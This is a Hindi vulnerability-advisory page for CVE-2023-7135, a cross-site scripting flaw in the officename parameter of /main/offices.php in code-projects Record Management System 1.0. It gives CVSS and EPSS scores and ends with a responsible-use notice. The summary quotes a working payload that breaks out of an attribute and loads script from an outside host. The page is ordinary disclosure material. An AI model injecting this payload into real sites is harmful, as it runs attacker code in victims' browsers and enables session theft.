CVE-2023-7135
code-projects रिकॉर्ड प्रबंधन प्रणाली कार्यालय offices.php क्रॉस-साइट स्क्रिप्टिंग
- प्रकाशित
- 28 दिस॰ 2023
- अद्यतन
- 2 अग॰ 2024
- सीएनए असाइन करना
- VulDB
- साक्ष्य देखे गए
- 28 अग॰ 2026
प्राथमिक सीवीएसएस
nvd · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:Nकम · अगले 30 दिन
- प्रतिशत
- 41.1%
- मॉडल दिनांक
- 21 सित॰ 2026
ईपीएसएस एक सांख्यिकीय अनुमान है, कोई निश्चितता या प्रभाव का माप नहीं। इसे सीवीएसएस, केईवी स्थिति, एक्सपोज़र और अपने वातावरण के साथ मिलाएं।
सारांश
code-projects Record Management System 1.0 में एक समस्या के रूप में वर्गीकृत भेद्यता पाई गई है। प्रभावित घटक Offices Handler की फ़ाइल /main/offices.php में एक अज्ञात फ़ंक्शन शामिल है। officename तर्क का इनपुट "><script src="https://js.rip/b23tmbxf49"></script> के साथ हेरफेर करने से क्रॉस-साइट स्क्रिप्टिंग उत्पन्न होती है। इस हमले को दूरस्थ रूप से लॉन्च करना संभव है। यह एक्सप्लॉइट सार्वजनिक रूप से प्रकट किया गया है और इसका उपयोग किया जा सकता है। VDB-249138 इस भेद्यता को सौंपा गया पहचानकर्ता है।
स्रोत
1- CVEsअनुसंधान
सामान्य भेद्यताएँ और जोखिम
जिम्मेदारीपूर्ण उपयोग
भेद्यता जानकारी का उपयोग केवल उन प्रणालियों पर करें जिनके मालिक आप हैं या परीक्षण के लिए अधिकृत हैं। किटप्लॉइट सार्वजनिक अनुसंधान मेटाडेटा से लिंक करता है और शोषण कोड या दुर्भावनापूर्ण पेलोड को संग्रहीत नहीं करता है।